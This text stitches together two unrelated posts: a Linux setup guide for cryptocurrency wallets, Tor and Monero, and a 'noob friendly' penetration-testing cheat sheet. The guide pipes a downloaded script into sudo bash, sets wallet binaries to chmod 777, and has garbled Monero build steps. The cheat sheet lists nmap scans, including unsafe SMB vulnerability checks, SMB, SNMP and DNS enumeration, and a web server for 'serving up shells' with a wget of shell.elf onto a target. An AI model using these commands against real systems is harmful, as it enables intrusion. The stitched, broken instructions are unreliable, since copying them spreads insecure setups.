sudo usermod -a -G fuse $user

Install Curl

$ sudo apt-get install curl

Install Browsers

Remove Firefox / Thunderbird

$ sudo apt remove firefox
$ sudo apt remove thunderbird

Add Chromium Browser

Chromium is a good choice because it supports the tor, jaxx, metamask, and ledger nano extensions. This makes the wallets and apps easily supported between devices and operating systems.
$ sudo apt install -y chromium-browser
If you need Flash, run the following commands.
$ sudo apt install -y pepperflashplugin-nonfree
$ sudo update-pepperflashplugin-nonfree --install
I typically configure Chromium to open in incognito mode by editing its application .desktop entry.
You have to change one line in the chromium-browser.desktop file. The best is to do that locally:
Copy the file from /usr/share/applications to /home/yourname/.local/share/applications
Open the file with gedit (open gedit and drag the local desktop file on to the gedit window)
Find the first line in the file that begins with Exec=
Replace that line with Exec=chromium-browser --incognito (see the sketch below)
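A minimal sketch of the edited entry (only the Exec line changes; all other keys stay as shipped):

[Desktop Entry]
Name=Chromium Web Browser
Exec=chromium-browser --incognito
Type=Application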

Brave

An additional browser may be helpful for non- crypto related browsing. I currently like the Brave browser or the tor browser.
For AMD64: $ wget -O brave.deb https://laptop-updates.brave.com/latest/dev/ubuntu64
$ sudo dpkg -i ./brave.deb
$ sudo apt-get install -f

Install TOR

$ sudo apt install tor
Start Service
$ sudo /etc/init.d/tor start
Verify Service
$ ps aux|grep tor
$ systemctl status tor
Start TOR Service on Boot
$ sudo update-rc.d tor enable

Tor Browser

$ sudo add-apt-repository ppa:webupd8team/tor-browser
$ sudo apt-get update
$ sudo apt-get install tor-browser

Install hashrat

Install hashrat (and standardnotes, if you use it). Hashrat is used to verify checksums.
$ sudo apt-get install hashrat
Use man page for details
$ man hashrat
Verify the checksums of all software you download, even from reputable sources, with hashrat. See the man page for the full syntax; a typical invocation is sketched below.
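(A sketch of a typical invocation, mirroring the Monero checks later in this post; the file name is a placeholder:)
$ hashrat -sha256 downloaded-package.deb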

Communications Programs

Installing standalone Signal Desktop

Download the repository's key and install it into the system
$ curl -s https://updates.signal.org/desktop/apt/keys.asc | sudo apt-key add -
$ sudo add-apt-repository "deb [arch=amd64] https://updates.signal.org/desktop/apt xenial main"
$ sudo apt update
$ sudo apt install signal-desktop

Install Telegram

$ sudo add-apt-repository ppa:atareao/telegram
$ sudo apt-get update
$ sudo apt-get install telegram


Install JAXX Wallet - jaxx.io

This can be done as an app image or as a chromium extension
https://jaxx.io/downloads.html
Copy jaxx-1.3.15-x86_64.AppImage to ~/Documents/wallets
Jaxx requires Ubuntu 12.04, Fedora 21, or Debian 8 (or later)
$ sha1sum jaxx-1.3.15-x86_64.AppImage
$ sudo chmod 777 jaxx-1.3.15-x86_64.AppImage
$ ./jaxx-1.3.15-x86_64.AppImage

Install Ledger Nano S

https://www.ledgerwallet.com/apps
https://www.ledger.com/products/ledger-nano-s
Download Ledger Live
https://support.ledgerwallet.com/hc/en-us/articles/115005165269-What-to-do-if-my-Ledger-Nano-S-is-not-recognized-on-Windows-and-or-Linux-
https://developer.chrome.com/apps/app_usb#caveats
On most Linux systems, USB devices are mapped with read-only permissions by default. To open a device through this API, your user will need to have write access to it too. A simple solution is to set a udev rule. Create a file /etc/udev/rules.d/50-yourdevicename.rules with the following content:
SUBSYSTEM=="usb", ATTR{idVendor}=="[yourdevicevendor]", MODE="0664", GROUP="plugdev"
$ sudo wget -q -O - https://raw.githubusercontent.com/LedgerHQ/udev-rules/master/add_udev_rules.sh | sudo bash
If the system won't update the udev rules with that file, copy the udev directory to /etc/udev/. Run nautilus as root:
$ sudo nautilus
Use the file explorer to copy the udev directory to /etc/udev/

Install Ledger Chrome Extentions

https://www.ledgerwallet.com/apps/

Install Ledger Wallet - Ripple

Execute the installation in /home/username/Documents/Wallet
$ sudo dpkg -i ledger_wallet_ripple_linux_x64_1.0.3.deb
$ sudo apt-get install -f

Install Ledger Wallet - NEO (NEON)

NEON website: http://neonwallet.com/
Neon also provides software wallets for neo and nep-5 tokens
Download the .deb file for ubuntu from here : https://github.com/CityOfZion/neon-wallet/releases Once downloaded...
.deb file install:
$ sudo dpkg -i Neon_0.2.4_amd64.Linux.deb
$ sudo apt-get install -f

AppImage file install:
Linux AppImage sha256: ed1011f895b145a43bf65f9b288755848445391d680ce33f9860e990c84fdde8
$ sha256sum Neon-0.2.2-x86_64.Linux.AppImage
$ sudo chmod 777 Neon-0.2.2-x86_64.Linux.AppImage
$ ./Neon-0.2.2-x86_64.Linux.AppImage

Install Monero

Before proceeding with the compilation, the following packages are required:

update Ubuntu's repository

$ sudo apt update
Install dependencies to be able to compile Monero
$ sudo apt install build-essential cmake libboost-all-dev miniupnpc libunbound-dev graphviz doxygen libunwind8-dev pkg-config libssl-dev libcurl4-openssl-dev libgtest-dev libreadline-dev libminiupnpc-dev libzmq3-dev
Monero Official Download Links
Windows, 64-bit
macOS, 64-bit
Linux, 64-bit
Note: for these examples I'm using the file monero-linux-x64-v0.12.0.0.tar.bz2. Replace this file name with the current release file name.
$ tar xjf monero-linux-x64-v0.12.0.0.tar.bz2
How to compile a program from source
  1. open a console
  2. use the command cd to navigate to the correct folder. If there is a README file with installation instructions, use that instead.
  3. extract the files with one of these commands: if it's a .tar.gz use tar xvzf PACKAGENAME.tar.gz; if it's a .tar.bz2 use tar xvjf PACKAGENAME.tar.bz2
./configure
make
sudo make install
Official download site: https://getmonero.org/downloads/#linux
Check hashes at: https://getmonero.org/downloads/hashes.txt
$ hashrat -sha256 monero-gui-linux-x64-v0.12.0.0.tar.bz2
$ hashrat -sha256 monero-linux-x64-v0.12.0.0.tar.bz2
Move the Monero applications to /Documents/wallet/monero/, /usr/share/bin/, or wherever you decide to install applications.

Compilation - This will take some research to do properly. I recommend downloading the tar file, checking the hash against the SHA256, and making the file executable. But for those who want to compile from source, here are my notes. I have done it, but it is involved and not a rookie task.

$ cd / (Change Directory to Root)
$ sudo mkdir -p /build/release/bin/
$ cp /home/dillinger/Downloads/monero-gui-linux-x64-v0.12.0.0.tar.bz2 /build/release/bin/
$ cd /build/release/bin/

download the latest Monero source code from github

$ sudo git clone --recursive https://github.com/monero-project/monero

From inside /build/release/bin/, list the contents with ls to verify that the monero/ directory is present in /build/release/bin/

Compile the release version with make (or make -j number_of_threads, e.g., make -j 2)
$ cd monero
$ sudo make

go into monero folder

$ cd monero/
$/build/release/bin/monero/maker
$ cd /
$ sudo mkdir -p /opt/monero
$ sudo mv -v ./build/release/bin/monero/* /opt/monero/
$ cd /opt/monero/

Alternatively, make release can be used instead of make. This compiles the source code without compiling the unit tests, which is faster and can avoid problems if the tests have compilation errors.

Installation: after successful compilation, the Monero binaries should be located in ./build/release/bin. I usually move the binaries into the /opt/monero/ folder. This can be done as follows:

optional

This should result in:
/opt/monero/
├── monero-blockchain-export
├── monero-blockchain-import
├── monerod
└── monero-wallet-cli

Now we can start the Monero daemon, i.e., monerod, and let it download the blockchain and synchronize itself with the Monero network. After that, you can run the monero-wallet-cli.

launch the Monero daemon and let it synchronize with the Monero network

$ /opt/monero/monerod

launch the Monero wallet

/opt/monero/monero-wallet-cli

Useful aliases (with rlwrap): monerod and monero-wallet-cli have neither tab-completion nor history. This problem can be overcome using rlwrap.
Alternate information and source: https://github.com/moneroexamples/compile-monero-09-on-ubuntu-16-04/blob/master/README.md

install rlwrap

$ sudo apt install rlwrap

download monerod and monero-wallet-cli commands files

$ wget -O ~/.bitmonero/monerocommands_simplewallet.txt https://raw.githubusercontent.com/moneroexamples/compile-monero-09-on-ubuntu-16-04/master/monerocommands_simplewallet.txt
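The alias definitions themselves aren't included in the post; with rlwrap and the command file above, they would look roughly like this (assumed, based on the paths used earlier):
alias monero-wallet-cli='rlwrap -f ~/.bitmonero/monerocommands_simplewallet.txt /opt/monero/monero-wallet-cli'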
Use a remote node to avoid the size of the Monero blockchain
Connecting to the node from the GUI wallet After you enter your password for your wallet, you will see a pop up that will give you the option to "use custom settings". Click on it. You will then be sent to the "Settings" page in the GUI. At this point you should see two text boxes to the right of a label that says "Daemon address". In the first box (the one to the left) you need to enter the address of the node that you want to connect to. This address might look like node.moneroworld.com or it could look like any old ip address. The smaller box to the right is where you enter the node's port. The default port is 18081 but if you are using a random node the port that is used will vary. The port for node.moneroworld.com uses 18089.
127.0.0.1 18081
node.moneroworld.com 18089
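If you use monero-wallet-cli instead of the GUI, the equivalent setting is the --daemon-address flag, using the host and port from the examples above:
$ /opt/monero/monero-wallet-cli --daemon-address node.moneroworld.com:18089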

Customize Desktop

Edit Log In Image
$ sudo apt install lightdm-gtk-greeter-settings
$ pkexec lightdm-gtk-greeter-settings
Edit Grub Settings
$ sudo gedit /etc/default/grub
$ sudo update-grub

This article is provided by u/blackfootradio at cryptotux

submitted by blackfootradio to CryptoTux

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may knock the service over

SMB enumeration

ls /usr/share/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

nbtscan

nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off the inverse name lookup (useful when name resolution hangs)
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site


Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc
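On the target side, anything served this way can be fetched over plain HTTP, e.g. (with 192.168.1.X standing in for your attack box):
wget http://192.168.1.X/shell.elf - Fetch a file served by the Python web server from the target machine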

Mounting File Shares

mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove password it will prompt on the CLI (more secure as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.1 25 or telnet 192.168.1.1 25 - Basic versioning / finger printing via the displayed banner

SNMP Enumeration

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d" " -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer

DNSRecon

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1 - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usr/share/doc/python-impacket-doc/examples/samrdump.py